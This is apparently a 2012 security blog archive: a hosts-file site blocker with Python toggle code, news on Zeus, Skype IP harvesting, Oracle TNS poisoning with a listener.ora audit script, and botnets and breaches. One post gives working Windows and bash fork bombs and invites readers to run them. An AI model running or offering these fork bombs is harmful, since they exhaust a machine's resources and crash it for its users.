Tuesday, October 23, 2012

MyWall-Your own little firewall

A simple, small but useful utility to keep unwanted websites from eating your time.


All of us have some important task to finish in the next couple of hours, but most of us waste a good part of that time socializing or wandering around the internet, and cannot focus on work because of the constant distractions coming from sites like Facebook, Twitter and YouTube.

It would be unfair to crown these sites as time-wasting; however, because of the continuous updates, it's actually very late when we realize that we have wasted a lot of time... at least that happens with me... :-P

Wouldn't it be nice to have something that disables these temporarily, without much overhead?

MyWall - Your own little firewall lets you toggle them (if you wish) with a single click.

Did I forget to mention... you can also use it as a site blocker for as many sites as you wish.
Useful in schools, small offices, even for your kids.

MyWall is a simple script I wrote that does, in one click, all the back-end work needed to block and unblock websites. Despite the name it is not a packet filter: it automates the hosts-file edit, so the blocked names simply stop resolving on that machine.

I made this because I'm too lazy to keep going to the antivirus firewall or the hosts file to block/unblock things...

You can Download MyWall from here.

All you have to do is extract the zip somewhere.
One click blocks the unwanted websites,
and clicking it again unblocks them.

PS: You may see a User Account Control prompt on Windows Vista or 7; just say yes. The prompt appears because the hosts file lives under System32 and can only be written from an elevated process.
Don't worry, it's not a virus...! It's a home-made script... ;)
Also, if the script doesn't execute, whitelist it in your antivirus. Antivirus products watch for hosts-file changes because malware uses the same trick to redirect sites, so a blocked script is the product doing its job, not a sign the script is broken.
My Kaspersky blocks it... I whitelisted it and it works fine..!

Yes, you must be wondering which sites it blocks and how to change them... eh?

Yes..! The list is editable.
Just open the MyWall.vbs file (which you get after extracting) in a text editor.
Notepad as usual; however, I recommend Notepad++ as it makes things clearer.
Now edit the WebsitesToBlock section (it's at the beginning of the script)
to add or remove website(s) in the banned list.

My predefined list, which you'll already see in the script, is:

WebsitesToBlock=Array("twitter.com", "www.youtube.com", "facebook.com")
 
Simple 'eh... :)
 
Cheers :)  
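What the one-click toggle has to do under the hood, written out in Python as an added example (my illustration, not the post's MyWall.vbs). It treats the hosts file as text so it can be exercised on a constructed sample without touching the system, and it goes a little beyond the post: because hosts entries match exact names only, "facebook.com" alone leaves "www.facebook.com" resolvable, so each name gets its www./bare twin, and both an IPv4 and an IPv6 line are written. The Windows path and the marker comments are my choices.

```python
"""Hosts-file toggle in the spirit of MyWall: one call blocks, the next
unblocks. Added example, not the post's script; works on the hosts file as
text so it can be tested offline on a constructed sample."""
from __future__ import annotations

# Markers let the unblock step remove exactly the lines the block step added
# and nothing a user (or other software) put in the hosts file by hand.
MARK_BEGIN = "# MyWall block begin"
MARK_END = "# MyWall block end"

# The post's predefined list.
WEBSITES_TO_BLOCK = ["twitter.com", "www.youtube.com", "facebook.com"]

# Hosts file location on Windows (assumed from the post's UAC remark: writing
# it needs an elevated prompt). Not used by the functions below.
WINDOWS_HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"


def _expand(sites: list[str]) -> list[str]:
    """Hosts entries match exact names only, so add the www./bare twin of
    each name. Other subdomains (m.facebook.com, ...) still need their own
    entries; this is a convenience block, not a domain-wide filter."""
    names: list[str] = []
    for site in sites:
        site = site.strip().lower()
        twin = site[4:] if site.startswith("www.") else "www." + site
        for name in (site, twin):
            if name not in names:
                names.append(name)
    return names


def is_blocked(hosts_text: str) -> bool:
    return MARK_BEGIN in hosts_text.splitlines()


def block(hosts_text: str, sites: list[str] = WEBSITES_TO_BLOCK) -> str:
    """Append a marked block pinning each name to loopback for both address
    families, so the entry is complete whichever family the client asks for.
    Idempotent: blocking twice changes nothing."""
    if is_blocked(hosts_text):
        return hosts_text
    lines = [MARK_BEGIN]
    for name in _expand(sites):
        lines.append(f"127.0.0.1 {name}")
        lines.append(f"::1 {name}")
    lines.append(MARK_END)
    if hosts_text and not hosts_text.endswith("\n"):
        hosts_text += "\n"
    return hosts_text + "\n".join(lines) + "\n"


def unblock(hosts_text: str) -> str:
    """Remove only the marked block; everything else is preserved verbatim."""
    kept: list[str] = []
    inside = False
    for line in hosts_text.splitlines():
        stripped = line.strip()
        if stripped == MARK_BEGIN:
            inside = True
            continue
        if stripped == MARK_END:
            inside = False
            continue
        if not inside:
            kept.append(line)
    return "\n".join(kept) + ("\n" if kept else "")


def toggle(hosts_text: str, sites: list[str] = WEBSITES_TO_BLOCK) -> str:
    """What one click on MyWall does: block if unblocked, unblock if blocked."""
    return unblock(hosts_text) if is_blocked(hosts_text) else block(hosts_text, sites)


def blocked_names(hosts_text: str) -> set[str]:
    """Names currently pinned to loopback (comments ignored): a quick
    'what does this machine block right now' check."""
    names: set[str] = set()
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and fields[0] in ("127.0.0.1", "::1", "0.0.0.0"):
            names.update(fields[1:])
    return names


# Constructed sample hosts file (the stock Windows file is only comments).
SAMPLE_HOSTS = "# constructed sample\n127.0.0.1 localhost\n::1 localhost\n"

if __name__ == "__main__":
    on = toggle(SAMPLE_HOSTS)
    print(sorted(blocked_names(on) - {"localhost"}))
    print(toggle(on) == SAMPLE_HOSTS)
```

To use it for real on Windows, read WINDOWS_HOSTS_PATH, pass the text through toggle(), write it back from an elevated prompt, then run ipconfig /flushdns so already-cached answers don't keep the site reachable for a while. Treat it as a self-discipline tool rather than a security control: anyone who can edit the file, or who browses to the server's IP directly, gets around it.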

Saturday, August 25, 2012

Fork Bombs... Destructive Simplicity


Have you heard of fork bombs...?
If not, try this and experience it yourself... ;)

PS: Try this in a VM (virtual machine), not on the actual machine. A fork bomb does nothing but spawn copies of itself until the system runs out of process slots or memory; there is no exploit in it, only exhaustion.

Copy this into a Notepad file:

-----------copy--here-------------
:fork
rem "start" opens a new console window running this same file (%0)...
start %0
rem ...and the pipe runs two more copies of it in this window
%0|%0
goto :fork
-----------copy--here-------------

Save it as anything.bat and execute it...!!
Enjoy...! Make your own custom bombs... ;)

This is just to demonstrate how a few lines of code can bring a system down...
Don't try it on host machines...

For Linux (Fedora, Ubuntu, Red Hat, CentOS)
this small piece of code does the trick...

:(){ :|:& };:

Type the above characters in a shell or terminal and press enter...

How it works: ":(){ ... }" defines a shell function named ":", its body ":|:&" calls the function twice, piping one copy into the other and backgrounding the pair, and the final ";:" invokes it, so the number of processes doubles with every step. The standard defence is a per-user process limit (ulimit -u, or pids limits in cgroups); many distributions set one by default, and root is normally exempt from it, which is one more reason not to test this as root.

Don't misuse it....
This is just for knowledge...

Wednesday, May 2, 2012

Zeus Variant Targets Cloud-Based Payroll Service


With critical business services migrating to the cloud, service providers have become a prime target for cybercriminals. In the latest example of financial malware targeting enterprises, we have discovered a Zeus attack that focuses on cloud payroll service providers. These attacks are designed to route funds to criminals and to bypass the industrial-strength security controls maintained by larger businesses.

The researchers have captured a Zeus configuration that targets Ceridian, a Canadian human resources and payroll solutions provider. In this attack, Zeus captures a screenshot of a Ceridian payroll services web page (https://clients.powerpay.ca/powerpay/Logon*) when a corporate user whose machine is infected with the Trojan visits it. This lets Zeus steal the user ID, password, company number and the icon the user selected for the image-based authentication system; screen capture defeats picture-based logins precisely because the secret is displayed rather than typed.
 
The financial losses associated with this type of attack can be significant. In August of last year, cyberthieves reportedly funneled $217,000 from the Metropolitan Entertainment & Convention Authority (MECA). According to published reports, an employee at MECA was victimized by a phishing e-mail and infected with malware that stole access credentials to the organization's payroll system. With valid credentials, the cyberthieves were able to add fictitious employees to the MECA payroll. These money mules, hired through work-at-home scams, then received payment transfers from MECA's bank account, which they forwarded to the fraudsters.

We expect to see increased cybercriminal activity using this type of fraud scheme for the following reasons:
1) Targeting enterprise payroll systems lets attackers siphon much larger amounts of money than targeting individual consumers.

2) By stealing the login credentials of enterprise users of these payroll services, fraudsters have everything they need to route payments to money mules before raising any red flags. With valid credentials they can also access personal, corporate and financial data without hacking into systems, while leaving very little evidence that malicious access is occurring.

3) By targeting a cloud service provider, the criminals bypass the tight security mechanisms typically employed by medium to large enterprises. The enterprise customers who use the service have no control over the vendor's IT systems and thus little ability to protect their back-end financial assets.

4) Cloud services can be accessed from unmanaged devices, which are typically less secure and more vulnerable to infection by financial malware such as Zeus.

Unfortunately, traditional antivirus mechanisms are largely unable to keep corporate users from being infected with Zeus. Attacks like this one are surgical in nature and use targeted reconnaissance combined with signature-evasion techniques to get a foothold inside corporate computers.

A better alternative for protecting sensitive cloud payroll, treasury and other financial applications is to keep malware off the endpoint in the first place. This requires a layered approach that looks for specific "crime logic" footprints, not signatures, to prevent malware on an infected machine from stealing login credentials.

For example: prevent malware from installing on a machine, and secure the communication between the computer and the cloud provider's website so that common techniques like HTML injection, keylogging and screen capture cannot grab data. Protect other web-based applications such as VPNs, CRM and collaboration systems as well, since malware can exploit them to steal user credentials and breach an enterprise's security perimeter completely undetected.

Shocking Statistics From The Latest Internet Threat Report

Anti-malware company Symantec released its Internet Security Threat Report for 2011 on Monday. The statistics are as follows:


A. Religious and ideological sites carry triple the average number of threats per infected site that pornographic websites do.

B. Top 10 categories of most-infected websites:
1. Blogs
2. Web communications
3. Religious websites
4. Personally hosted sites
5. Business sites
6. Shopping sites
7. Education sites
8. Automotive-themed sites
9. Health and medicine sites
10. Porn sites

C. Three quarters of spam messages were pharma-themed; a quarter were sex- and dating-themed.

D. Spam volumes dropped by around 20 billion messages year over year, to an average of 75% of all e-mail last year, compared with 88.5% in 2010.

E. The U.S. was the top source of every category of malicious activity.

F. India leads in the creation of malware and the use of spam zombies. (I am proud of it.) ;-)

G. Around 13% of bot activity and around 34% of web-based attacks originated in the U.S. Close to half of all phishing websites were based in the U.S.

H. China saw a steep drop in malicious activity, of about 10%.

I. Reports of vulnerabilities in industrial control and SCADA systems rose from 15 in 2010 to 129 in 2011.

Skype IP address Vulnerability may not be so new

Skype is warning users following the launch of a site devoted to harvesting user IP addresses. The Skype IP-Finder site allowed third parties to see a user's last known IP address by simply typing in a user name.

A script offering the same lookup has been uploaded to GitHub. According to its page, it can look up the IP addresses of online Skype accounts and return both the remote and the local IP of that account on a website.

Using the script is trivial: enter the user name of a Skype user, fill out the captcha, and click the search button to start the lookup. You receive the user's remote IP and port as well as the local IP and port.

Adrian Asher, director of product security at Skype: "We are investigating reports of a new tool that captures a Skype user's last known IP address. This is an ongoing, industry-wide issue faced by all peer-to-peer software companies. We are committed to the safety and security of our customers and we are taking measures to help protect them."

The proof of concept is fairly simple. All an attacker needs to do is download a special Skype build and alter a few registry keys to enable debug-log file creation. When adding a Skype contact, the victim's information card can be viewed before the actual request is sent; at that point the log file records the user's IP address.

The software, posted on Pastebin, works on a modified version of Skype 5.5 and involves adding a few registry keys that let the attacker check the IP address of users currently online. Services like Whois will then give further details such as the city, country, internet provider and/or the internal IP address of the target.

This particular flaw was discussed in a paper presented by an international team of researchers in November at the Internet Measurement Conference 2011 in Berlin.

There is currently no way to protect yourself against the lookup of your IP address, other than not being logged in to Skype when the software is not needed. The only other option is a virtual private network or proxy, so that the address the lookup reveals is not your own.

Is $10,000 per day from Google Ads less for the Flashback malware Creator?

In a recent analysis of the business model behind the Flashback Trojan, Symantec security researchers reported that the main objective of the malware is revenue generation through an ad-clicking component. Symantec's researchers estimate that the cybercriminals behind the Flashback Mac OS X botnet may have raked in about $10,000 a day.

Dr. Web, the Russian security firm that discovered the massive Flashback botnet last month, has provided new data on the number of Macs still infected. The results show that while close to 460,000 machines remain infected, the botnet is shrinking at a rate of close to a hundred thousand machines a week as Mac users get around to downloading Apple's removal tool or installing antivirus.

When an infected user runs a Google search, Google returns its normal search results. Flashback waits for the user to click on an ad, and when that happens the user is silently directed to another, irrelevant ad that generates revenue for the attackers. As a result, Google doesn't know that someone clicked its client's ad, and the client never learns that its ad wasn't delivered. Ultimately, Google's advertising clients are paying for the Flashback operators' ads.

Story posted on Symantec's blog:
The Flashback ad-clicking component is loaded into Chrome, Firefox and Safari, where it can intercept all GET and POST requests from the browser. Flashback specifically targets search queries made on Google and, depending on the query, may redirect users to another page of the attacker's choosing, where the attackers receive revenue for the click. (Google never receives the intended ad click.)

The ad-click component parses out requests resulting from an ad click on Google Search and checks them against a whitelist. If the request is not whitelisted, it forwards the request to a malicious server.

The attackers tricked Mac users into downloading the malware by disguising it as an update to Adobe's Flash Player.

New zero day exploit in Oracle Database

Oracle has recommended workarounds for a zero-day Oracle Database flaw that was not fixed in the company's April Critical Patch Update. Oracle issued a security alert for the vulnerability, known as TNS Poison, which was disclosed by researcher Joxean Koret after he mistakenly concluded that Oracle had fixed it. It allows an attacker to hijack the information exchanged between clients and databases.

Koret originally reported the vulnerability to Oracle in 2008, four years ago, and said he was surprised to see it listed as fixed in Oracle's most recent Critical Patch Update without any acknowledgment of his work.

"This vulnerability is remotely exploitable without authentication, and if successfully exploited, can result in a full compromise of the targeted Database," the company warned.

"This security alert addresses the security issue CVE-2012-1675, a vulnerability in the TNS listener which has been recently disclosed as 'TNS Listener Poison Attack' affecting the Oracle Database Server. This vulnerability may be remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the confidentiality, integrity and availability of systems that do not have the recommended solution applied," Oracle wrote.

The TNS Listener feature at the heart of this, remote registration, dates back to at least 1999 and version 8i of the Oracle Database. A listener accepts instance registrations over the network, so an attacker can register a "service" of his own for an existing database name; the listener then load-balances legitimate client connections to the attacker, who proxies them to the real database. By sending a simple registration request to the service, the attacker hijacks connections of legitimate users without a password or other authentication. From then on, data traveling between legitimate users and the server passes through the connection set up by the attacker.

Oracle's alert applies to the supported 10g and 11g database releases; until a fix ships for an installed release, the workarounds in the alert are the protection.
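A quick check for whether a listener still accepts the remote registration this attack depends on, added here as an example of my own rather than anything from the post or from Oracle. It reads a listener.ora as text and reports which of the documented mitigations is present: dynamic registration switched off (DYNAMIC_REGISTRATION_listener), valid node checking for registration (VALID_NODE_CHECKING_REGISTRATION_listener, on releases that support it), or class of secure transport (SECURE_REGISTER_listener restricted to IPC/TCPS). The parameter names are Oracle's documented listener.ora settings, so confirm against the Net Services reference for your release; the sample files and host name are constructed.

```python
"""Audit a listener.ora for the documented mitigations against TNS listener
poisoning (CVE-2012-1675). Added example, not Oracle's or the post's code;
parameter names follow Oracle's listener.ora documentation, sample files
below are constructed."""
import re

# Top-level "NAME = value" lines. Nested (DESCRIPTION = ...) blocks start
# with "(" and never match, which is what we want.
PARAM_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9_]*)\s*=\s*(.+?)\s*$")


def parse_params(listener_ora: str) -> dict[str, str]:
    """Case-insensitive NAME -> VALUE map of the simple parameters."""
    params: dict[str, str] = {}
    for line in listener_ora.splitlines():
        line = line.split("#", 1)[0]  # strip comments
        m = PARAM_RE.match(line)
        if m:
            params[m.group(1).upper()] = m.group(2).upper()
    return params


def audit_listener(listener_ora: str, listener: str = "LISTENER") -> tuple[bool, str]:
    """Return (protected, reason). 'Protected' means this listener does not
    accept instance registration from arbitrary remote hosts over plain
    TCP, which is the primitive the poison attack needs."""
    p = parse_params(listener_ora)
    name = listener.upper()

    # 1. Dynamic registration off: only static SID_LIST entries are served,
    #    so nothing can register a rogue instance at all.
    if p.get(f"DYNAMIC_REGISTRATION_{name}", "ON") in ("OFF", "0"):
        return True, "dynamic registration disabled"

    # 2. Valid Node Checking for Registration: registrations accepted only
    #    from the local host, or from listed nodes / the local subnet.
    vncr = p.get(f"VALID_NODE_CHECKING_REGISTRATION_{name}", "OFF")
    if vncr in ("ON", "1", "LOCAL", "2", "SUBNET", "3"):
        return True, f"VNCR={vncr}"

    # 3. Class of Secure Transport: registration only over IPC and/or TCPS,
    #    neither of which a remote attacker without the wallet can use.
    cost = p.get(f"SECURE_REGISTER_{name}")
    if cost is not None:
        protocols = set(re.findall(r"[A-Z]+", cost))
        if "TCP" not in protocols:
            return True, f"COST restricts registration to {sorted(protocols)}"
        return False, "SECURE_REGISTER still allows TCP"

    return False, "no registration restriction: remote TNS registration accepted"


# Constructed samples: a stock listener.ora and two hardened variants.
DEFAULT_LISTENER_ORA = """\
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1521))
    )
  )
"""

HARDENED_LISTENER_ORA = DEFAULT_LISTENER_ORA + """
# registrations accepted only from the listener's own host
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON
"""

COST_LISTENER_ORA = DEFAULT_LISTENER_ORA + """
SECURE_REGISTER_LISTENER = (IPC)
"""

if __name__ == "__main__":
    for label, cfg in (("default", DEFAULT_LISTENER_ORA),
                       ("vncr", HARDENED_LISTENER_ORA),
                       ("cost", COST_LISTENER_ORA)):
        print(label, audit_listener(cfg))
```

Run it over the listener.ora of every database host (the listener name defaults to LISTENER; pass the real name for non-default listeners). A file that passes this check still needs the static SID_LIST entries the instances need once dynamic registration is restricted, which is exactly the part of the workaround that tends to get skipped.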

Tuesday, April 3, 2012

Chinese hacker targeting Indian government and Tibetan activists Sites

Websites of the Indian government and of Tibetan activists in the country are under attack in a cyber campaign attributed to a Chinese hacker working at the Chinese internet company Tencent.

The suspect in question is Gu Kaiyuan, once a graduate student at a Chinese university that receives government financial support for its computer security program and currently an employee at the Chinese portal Tencent. Before Kaiyuan started the attacks, collectively called the Luckycat campaign, he was involved in recruiting students for his school's computer security and defense research.

The Luckycat campaign has been linked to 90 attacks in the recent past against targets in India and Japan, as well as against Tibetan activists, said the report released by the Japanese security firm Trend Micro. Luckycat has compromised about 233 computers, many of them in India, and the report shows that the perpetrators began around June 2011.

Trend Micro was also able to recover a set of campaign codes used to track compromised systems. "The campaign codes often contain dates that indicate when each malware attack was launched. This demonstrates how actively and frequently the attackers launched attacks," the report reads. "The campaign codes also reveal the attackers' intent, as some of these referenced the intended targets."

The report did not directly implicate the Chinese government, but security researchers believe the style of the attacks and the types of targets indicate state-sponsored spying.

DKFBootKit - First Android BootKit Malware

NQ Mobile Security Research Center has recently uncovered a new malware family, DKFBootKit, identified while monitoring and analyzing the evolution of earlier DroidKungFu variants. What sets DKFBootKit apart from malware like DroidDream is that it replaces certain boot-time components and can start running before the system has completely booted up.

DKFBootKit repackages legitimate apps by enclosing its own malicious payload in them. The apps it chooses to infect are utility apps that require root privilege to work properly. NQ says the malicious code has already infected 1,657 Android devices in the past two weeks and has appeared in at least 50 different mobile apps.

These apps have legitimate reasons to request root privilege for their own functionality, so it is reasonable to expect that users will grant it. DKFBootKit then uses the granted root privilege for its own purposes, namely compromising the system's integrity.

To avoid being infected by this beast, NQ recommends three common-sense steps:
  • First, don't download apps from sketchy app stores.
  • Second, don't grant permissions to apps from unknown sources, and always read the permissions an app is requesting.
  • Third, install a security app that can scan your apps for malicious code.
NQ Mobile Security for Android is available for download.

50K Cards Compromised using Credit Card Processor

Some 50,000 credit and debit cardholders may have had their information exposed following a security breach at Global Payments. The breach occurred sometime between Jan. 21, 2012 and Feb. 25, 2012.

Both Visa and MasterCard have confirmed that they warned U.S. banks that a card processor was breached. Both firms say their own security systems were not compromised. MasterCard said law enforcement has been notified and an "independent data security organization" is conducting a forensic review. "MasterCard's own systems have not been compromised in any manner," a company spokesman said in a statement. The company will "continue to both monitor this event and take steps to safeguard account information."

Because a processor sits in the middle, directing where payment information goes, an attack on its systems exposes a lot of private financial data. Alerts sent to U.S. banks late last week advised them that certain cards may have been compromised.

"While the scope and details of the attack are not yet known, it shows that three years after the Heartland Payment Systems breach of 130 million credit card numbers, credit card data is still vulnerable," Roiter said.

Friday, March 30, 2012

Kelihos Botnet with 110,000 PCs take down finally

Botnets are particularly insidious: they use thousands of malware-infected computers whose owners are unaware they are being used for sending spam, launching denial-of-service attacks and stealing data. Taking one down poses its own challenges; the main problem is that legitimate security companies cannot use the same kind of weapons as the criminals.

A group of malware experts from Kaspersky Lab, CrowdStrike, Dell SecureWorks and the Honeynet Project have worked together to disable the second version of the Kelihos botnet, which is significantly bigger than the one shut down by Microsoft and its partners.

Kelihos is used to send spam, carry out DDoS attacks, and steal online currency such as bitcoin wallets. It operates as a peer-to-peer botnet, which is harder to take down than one with centralized command-and-control (C&C) servers, according to Tillmann Werner, a senior researcher at CrowdStrike.

Seculert reports that Kelihos-B, which was distributed as a Facebook worm over recent weeks, is still active and spreading even after this week's shutdown attempt. The peer-to-peer Kelihos botnet, also known as Hlux, was pulled into a sinkhole by the group from Kaspersky Lab, Dell SecureWorks, CrowdStrike's intelligence team and the Honeynet Project.

It's unclear who is behind Kelihos, Werner said. It was created last October after Microsoft used a sinkhole to halt the original Kelihos botnet, which had infected about 41,000 computers. The latest Kelihos used servers with hosts registered in Sweden, Russia and Ukraine that were controlled by a botmaster, according to CrowdStrike.

The machines are still infected, and the researchers are relying on ISPs to inform affected users. What is to say this botnet won't just morph again? "That is a possibility," said CrowdStrike's Mr. Meyers. "But when that happens, we'll be there to take it back down."

A Russian Zeus attacker Sentenced from Million Dollar Fraud

A Russian man who was part of an elaborate scheme that used the Zeus banking Trojan, and mules on U.S. visas, to move cash stolen from U.S. businesses out of the country was sentenced on March 23 to two years in U.S. federal prison.

Nikolay Garifulin received the two-year term for his involvement in a global bank fraud scheme that used hundreds of phony bank accounts to steal over $3 million from dozens of U.S. accounts compromised by malware attacks.

According to court documents and statements, Garifulin was part of a cyber bank fraud scheme, backed by Eastern European hackers, to steal money from the bank accounts of small and mid-sized businesses throughout the U.S. The attacks used the Zeus Trojan, which embeds itself in victims' computers and records keystrokes as they log into their online bank accounts.

The hackers behind the malware then used the captured account information to take over the victims' bank accounts and make unauthorized transfers of thousands of dollars at a time to accounts controlled by co-conspirators, including Garifulin, who were members of a money mule organization.

Garifulin collected money that mules had withdrawn from the phony accounts in the United States and, under the direction of the organization's leader, distributed it to other co-conspirators and transported it back to Eastern Europe. He also arranged for fake passports to be sent from Eastern Europe to mules in the United States.

In addition to his prison term, Garifulin, 23, of Volgograd, Russia, was sentenced to three years of supervised release. He was also ordered to forfeit $100,000 and to pay $192,123,122 in restitution.

Japan orders Google to remove auto-complete function over privacy complaint

Google has been ordered to disable part of its autocomplete function in Japan after complaints that it violates privacy. According to a report by The Japan Times, the court was acting on a petition accusing Google's autocomplete feature of being defamatory.

The petition was filed by a Japanese man (name not disclosed) who alleged that some of the autocomplete suggestions accompanying his name were not only defamatory but also breached his privacy. The petitioner claimed that these suggestions even cost him his job. He reached this conclusion after discovering that when people type his name into Google's search engine, words suggesting criminal acts he knows nothing about appear automatically. If one of the suggested terms is selected, more than 10,000 items defaming or disparaging him show up in the results, his lawyer Tomita said.

Google has so far not complied with the court's order, but said it was "reviewing the order". "A Japanese court issued a provisional order requesting Google to delete specific terms from autocomplete," a Google spokesperson said in a statement. "The judge did not require Google to completely suspend the autocomplete function."

Google defended the system, arguing that because the suggestions are generated mechanically rather than by an individual, they are not an invasion of privacy. "These searches are produced by a number of factors including the popularity of search terms," the company said.

Google has had a few problems with cases of this sort. Last year, when a British man was falsely accused of being a paedophile in a Google Places review, the company had to pull it. The search engine also had to comply with an Indian ruling directing internet companies to block religiously offensive material from search results.

Return of Lulzsec, Dump 170937 accounts from Military Dating Site

A new hacking group going by the name LulzSecReborn has posted the names, usernames, passwords and e-mail addresses of 170,937 accounts from MilitarySingles.com on Pastebin as part of the group's Operation Digiturk. LulzSec was a major ticket item last year as the group hacked a number of high-profile websites, all in the name of the "lulz". After their so-called "50 Day Cruise", the group broke up and went their separate ways. The hackers claim the dump contains addresses such as @us.army.mil, @carney.navy.mil, @greatlakes.cnet.navy.mil and @microsoft.com.

In response to a query by the Office of Inadequate Security, ESingles, the parent company of MilitarySingles.com, said that there is "no actual evidence that MilitarySingles.com was hacked and it is possible that the Tweet from Operation Digiturk is simply a false claim." LulzSecReborn then defaced the site (as shown in the page above) and replied: "Stupid Administrator: 'There is no evidence MilitarySingles is hacked'. Well guess what?" Commenting on the breach, the Office of Inadequate Security said: "If you know a member of the military who uses or has used the site, do them a favor and suggest they change their password on any site where they may have reused it – including their mil.gov email account."

In a video posted to YouTube last weekend and titled LulzSec Returns, the group says it decided to "bring back our humble hacking group and set sail towards the interwebs again". Referring to the arrests, it said these had "merely disrupted the active faction".

Facebook profiles can be hijacked by Chrome extensions malware


Cybercriminals are uploading malicious Chrome browser extensions to the official Chrome Web Store and using them to hijack Facebook accounts, according to security researchers from Kaspersky Lab. The rogue extensions are advertised on Facebook by scammers and claim to let you change the color of your profile page, track profile visitors, or even remove social media viruses.

The attacks present themselves as suggestions to install Facebook apps. Those apps are not real; they are malware, and in one case a malware-laden Chrome extension hosted in Google's own Chrome Web Store. The victim is walked through a series of steps that include installing a fake Adobe Flash Player Chrome extension. The launchpad for the fake Flash Player is a Facebook app called "Aprenda"; once installed, it redirects users to the Chrome Web Store and encourages them to install the fake Flash extension.

"This last one caught our attention not because it asks the user to install a malicious extension, but because the malicious extension is hosted at the official Google's Chrome Web Store. If the user clicks on 'install application' he will be redirected to the official store. The malicious extension presents itself as 'Adobe Flash Player'," wrote Fabio Assolini. "Be careful when using Facebook. And think twice before installing a Google Chrome extension," he adds.

Uploading multiple rogue extensions to the Chrome Web Store and running several Facebook spam campaigns to advertise them lets attackers compromise thousands of accounts quickly. The malware behaves much like other Facebook scams, for instance by inviting the victim's friends to install it, but the purpose of hijacking the accounts is to generate fraudulent "Likes", which are sold for about US$27 per 1,000.

The extension Assolini found was concentrated in Brazil, where Chrome holds 45% of the browser market and Facebook is by far the most popular social network. That does not mean the problem is isolated to Brazil: the malicious extension was installed in numerous countries, including the U.S. With these risks in mind, "think twice before installing a Google Chrome extension". Hosting on the official store is no guarantee of safety; an extension with permission to read and modify pages on facebook.com can act in the user's session just as the user can.

Thursday, March 29, 2012

Facebook Profile Viewer rogue application spreads on social network

A rogue application which claims to let you see who has viewed your Facebook profile is spreading between accounts on the popular social network. Messages claiming that Facebook has issued a new update which lets you check who has visited your profile are making the rounds:

New Update from facebook. Now you can check who visited your profile. check here -------->>>FAŒBOOK PROFILE VIEWER ®<<<<------
Who Watching your Profile ?

If you are intrigued enough by the Facebook Profile Viewer to click on the link, you are asked to permit an application to access your profile. You should always be very careful, of course, about allowing applications to read and write to your Facebook profile, and this time is no exception. Although at first you may believe that the application is showing you the details of people who have viewed your profile, behind the scenes it is posting a message to your Facebook page without your explicit permission, encouraging others to use the application too.

Clearly rogue applications like this could be used for scooping up personal information, or for spreading spam and scams across the social network. So if you fell for it, remove the messages from your timeline, revoke the app's publishing rights, report it as spam to Facebook, and make sure you have revoked its access to your account.

And remember this: Facebook does not give you any way to find out who has been viewing your profile. Any application or link which claims it can should be treated with great suspicion.

Dutch Police Arrest 17-year-old Suspected of Breaching Hundreds of KPN Servers

          The Dutch High Tech Crime Team has arrested a 17-year-old suspected of compromising customer account data on hundreds of servers belonging to telecommunications operator KPN. The teenager was arrested last Tuesday in the Dutch town of Barendrecht, where police seized an encrypted computer, two laptops and other storage media including external hard drives, DVDs and USB sticks, the Dutch Public Prosecution Service announced on Monday.

          "He has made a confession," said Wim de Bruin, spokesman for the Public Prosecution Service.
The arrested teenager called himself "xS", "Yoshioka" and "Yui" online, and is suspected of breaching the security of hundreds of KPN servers last January, compromising user data and damaging KPN's infrastructure, said the Prosecution Service.

          KPN, the biggest telecom operator in the Netherlands, was forced to overhaul its systems to get rid of installed malicious software after the hack was discovered. The National Cyber Security Center of the Netherlands also assessed the security breach and concluded that national security was not compromised. In the wake of the hack, KPN suspended access to 2 million email accounts and asked users to change their passwords, after account details of KPN customers were leaked on Pastebin in early February. The KPN data that appeared online was filtered from the captured database.

          The arrested teenager was followed online for weeks and the Dutch police collaborated closely with the Cyber Terror Response Center in South Korea and the Australian Federal Police, according to the Prosecution Service. A person using the aliases "Yui", "Yoshiaka" and "xS" appeared to have bragged about the KPN hack in a chat channel for students at the Korea Advanced Institute of Science and Technology (KAIST), the prosecution said.

          Besides hacking KPN, the 17-year-old is also suspected of hacking computers at KAIST and at Trondheim University in Norway, and of breaching the security of Tohoku University in Japan. He is also thought to have been running a website used for selling stolen credit card data, according to the prosecution.
According to De Bruin the teenager did not confess to the other allegations. "Those are still being investigated," he said.

          After the teenager's arrest, a judge ruled that he was to be kept in custody for at least two weeks. After that period, the Prosecution Service will assess if he has to be kept in custody, or can be freed until his trial. The suspect has legal support from a solicitor and was visited by the Dutch council for child protection, said the Prosecution Service. According to De Bruin, the maximum penalty the teenager faces is two years in prison. The maximum penalty is reduced due to his age. "For an adult the maximum penalty would be six years imprisonment," De Bruin said.

           In the wake of the hacking, KPN said last week it will appoint a Chief Security Officer (CSO), and later this year will set up a permanent control center to monitor its systems. The company has replaced the compromised systems and will spend months checking the security of all its other systems.

Justin Bieber's Twitter account - hacked!

          Lend a little sympathy to pop star Justin Bieber today, after his Twitter account was hacked and an unauthorised message was sent to his 19 million fans.
19 million my ass. #biebermyballs
          Fortunately the message was rapidly deleted, and it appears that the account was compromised more to spread embarrassing graffiti rather than with more malicious intention. Just imagine how much worse things would have been if millions of Justin Bieber fans had seen a tweet from their hero offering, say, free concert tickets - and the link had really pointed to a website designed to strike their computers with malware.
          That's not to say that the hacker didn't do any serious damage at all, of course. According to reports, whoever broke into Justin Bieber's Twitter account also began to unfollow and block some of the folks that the Canadian singer follows.

          If you're one of Justin Bieber's many fans, please learn something from your idol's misfortune. Always choose a strong, secure password for your Twitter account and make sure that you are not using it on any other websites, and never share it with anyone else.

          Furthermore, be careful that you only log into your Twitter account from a computer that is properly protected with up-to-date anti-virus software and security patches - in other words, maybe you shouldn't trust that computer in a hotel lobby or your friend's PC. Keylogging spyware can grab your password without you knowing, and pass it onto malicious hackers.
And remember that just because a Twitter account is "verified", doesn't necessarily mean you can trust every message that is posted to it.

Friday, March 23, 2012

User IDs and Clear-Text Passwords Leaked from US Army’s CECOM

          Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM).

